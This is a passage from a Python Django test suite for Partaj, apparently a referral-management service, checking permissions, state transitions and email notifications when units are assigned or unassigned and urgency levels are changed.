f"/referrals-list/referral-detail/{referral.id}"
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": link,
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": other_unit.name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_UNIT_TEMPLATE_ID"],
"to": [{"email": other_unit_owner.email}],
}
)
def test_assign_unit_referral_from_in_validation_state(self, mock_mailer_send):
"""
New unit assignments can be added on a referral in the IN_VALIDATION state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
initial_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
other_unit_owner = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=other_unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
self.assertEqual(len(response.json()["units"]), 2)
self.assertEqual(response.json()["units"][0]["id"], str(initial_unit.id))
self.assertEqual(response.json()["units"][1]["id"], str(other_unit.id))
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 2)
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
link = (
f"https://partaj/app/unit/{str(other_unit.id)}"
f"/referrals-list/referral-detail/{referral.id}"
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": link,
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": other_unit.name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_UNIT_TEMPLATE_ID"],
"to": [{"email": other_unit_owner.email}],
}
)
def test_assign_unit_referral_from_answered_state(self, mock_mailer_send):
"""
No new unit assignments can be added on a referral in the ANSWERED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=other_unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition ASSIGN_UNIT not allowed from state answered."]},
)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_from_closed_state(self, mock_mailer_send):
"""
No new unit assignments can be added on a referral in the CLOSED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=other_unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition ASSIGN_UNIT not allowed from state closed."]},
)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
# UNASSIGN UNIT TESTS
def test_unassign_unit_referral_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot unassign unit from referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/", {"unit": str(other_unit.id)}
)
self.assertEqual(response.status_code, 401)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_by_random_logged_in_user(self, mock_mailer_send):
"""
Random logged-in users cannot unassign unit from referrals.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_by_linked_user(self, mock_mailer_send):
"""
A referral's linked user cannot unassign unit from referrals.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.ASSIGNED, user=user
)
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_by_linked_unit_member(self, mock_mailer_send):
"""
A member of a referral's linked unit cannot unassign unit from referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_own_unit_referral_by_linked_unit_organizer(
self, mock_mailer_send
):
"""
An organizer in a referral's linked unit can unassign their own unit
from a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_not_called()
def test_unassign_another_unit_referral_by_linked_unit_organizer(
self, mock_mailer_send
):
"""
An organizer in a referral's linked unit can unassign another linked unit
from a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_with_only_one_linked_unit(self, mock_mailer_send):
"""
A unit that is the only one assigned to a referral cannot be unassigned
from said referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Unit cannot be removed from this referral."]}
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_with_assigned_member(self, mock_mailer_send):
"""
A unit that has a member assigned to a referral cannot be unassigned
from said referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
referral.assignees.add(user)
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Unit cannot be removed from this referral."]}
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_from_received_state(self, mock_mailer_send):
"""
A referral in the RECEIVED state can have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_from_processing_state(self, mock_mailer_send):
"""
A referral in the PROCESSING state can have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_from_in_validation_state(self, mock_mailer_send):
"""
A referral in the IN_VALIDATION state can have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
def test_unassign_unit_referral_from_answered_state(self, mock_mailer_send):
"""
A referral in the ANSWERED state cannot have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Unit cannot be removed from this referral."]}
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_from_closed_state(self, mock_mailer_send):
"""
A referral in the CLOSED state cannot have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Unit cannot be removed from this referral."]}
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
# CHANGE URGENCY LEVEL TESTS
def test_change_urgencylevel_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot change a referral's urgency level.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
new_urgencylevel = factories.ReferralUrgencyFactory()
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
)
self.assertEqual(response.status_code, 401)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_by_random_logged_in_user(self, mock_mailer_send):
"""
Random logged-in users cannot change a referral's urgency level.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
new_urgencylevel = factories.ReferralUrgencyFactory()
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_by_referral_linked_user(self, mock_mailer_send):
"""
A referral's linked user cannot change the referral's urgency level.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
user=user, state=models.ReferralState.RECEIVED
)
new_urgencylevel = factories.ReferralUrgencyFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_by_unit_member(self, mock_mailer_send):
"""
A regular unit member cannot change a referral's urgency level.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_by_unit_admin(self, mock_mailer_send):
"""
A unit admin can change a referral's urgency level.
"""
referral = factories.ReferralFactory()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.ADMIN, unit=referral.units.get()
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
old_urgencylevel = referral.urgency_level
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
# Make sure the urgency level is changed
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.URGENCYLEVEL_CHANGED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(new_urgencylevel.id, referral.urgency_level.id)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"created_by": user.get_full_name(),
"link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
"message": "La justification du changement.",
"new_due_date": dateformat.format(
referral.get_due_date(), "j F Y"
),
"old_due_date": dateformat.format(
referral.created_at + old_urgencylevel.duration, "j F Y"
),
"topic": referral.topic.name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CHANGED_URGENCYLEVEL_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
# Check the urgencylevel history instance that was created
urgencylevel_history = models.ReferralUrgencyLevelHistory.objects.get(
referral=referral, new_referral_urgency=new_urgencylevel
)
self.assertEqual(
"La justification du changement.",
urgencylevel_history.explanation,
)
self.assertEqual(new_urgencylevel, urgencylevel_history.new_referral_urgency)
self.assertEqual(old_urgencylevel, urgencylevel_history.old_referral_urgency)
def test_change_urgencylevel_by_unit_owner(self, mock_mailer_send):
"""
Unit owners can change a referral's urgency level.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
old_urgencylevel = referral.urgency_level
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
# Make sure the urgency level is changed
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.URGENCYLEVEL_CHANGED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(new_urgencylevel.id, referral.urgency_level.id)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"created_by": user.get_full_name(),
"link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
"message": "La justification du changement.",
"new_due_date": dateformat.format(
referral.get_due_date(), "j F Y"
),
"old_due_date": dateformat.format(
referral.created_at + old_urgencylevel.duration, "j F Y"
),
"topic": referral.topic.name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CHANGED_URGENCYLEVEL_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
# Check the urgencylevel history instance that was created
urgencylevel_history = models.ReferralUrgencyLevelHistory.objects.get(
referral=referral, new_referral_urgency=new_urgencylevel
)
self.assertEqual(
"La justification du changement.",
urgencylevel_history.explanation,
)
self.assertEqual(new_urgencylevel, urgencylevel_history.new_referral_urgency)
self.assertEqual(old_urgencylevel, urgencylevel_history.old_referral_urgency)
def test_change_urgencylevel_wrong_urgencylevel_id(self, mock_mailer_send):
"""
The urgency level parameter must point to an actual existing urgency level,
otherwise the request errors out.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
new_urgencylevel_id = 0
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel_id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(referral.urgency_level.id, 0)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_missing_urgencylevel_id(self, mock_mailer_send):
"""
The request errors out when the urgency level ID parameter is missing.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(""),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_missing_urgencylevel_explanation(
self, mock_mailer_send
):
"""
Urgencylevel explanation is mandatory
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_from_processing_state(self, mock_mailer_send):
"""
The urgency level can be changed on a referral in the PROCESSING state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
old_urgencylevel = referral.urgency_level
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
# Make sure the urgency level is changed
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.URGENCYLEVEL_CHANGED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
self.assertEqual(new_urgencylevel.id, referral.urgency_level.id)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"created_by": user.get_full_name(),
"link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
"message": "La justification du changement.",
"new_due_date": dateformat.format(
referral.get_due_date(), "j F Y"
),
"old_due_date": dateformat.format(
referral.created_at + old_urgencylevel.duration, "j F Y"
),
"topic": referral.topic.name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CHANGED_URGENCYLEVEL_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
# Check the urgencylevel history instance that was created
urgencylevel_history = models.ReferralUrgencyLevelHistory.objects.get(
referral=referral, new_referral_urgency=new_urgencylevel
)
self.assertEqual(
"La justification du changement.",
urgencylevel_history.explanation,
)
self.assertEqual(new_urgencylevel, urgencylevel_history.new_referral_urgency)
self.assertEqual(old_urgencylevel, urgencylevel_history.old_referral_urgency)
def test_change_urgencylevel_from_in_validation_state(self, mock_mailer_send):
"""
The urgency level can be changed on a referral in the IN_VALIDATION state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
old_urgencylevel = referral.urgency_level
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
# Make sure the urgency level is changed
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
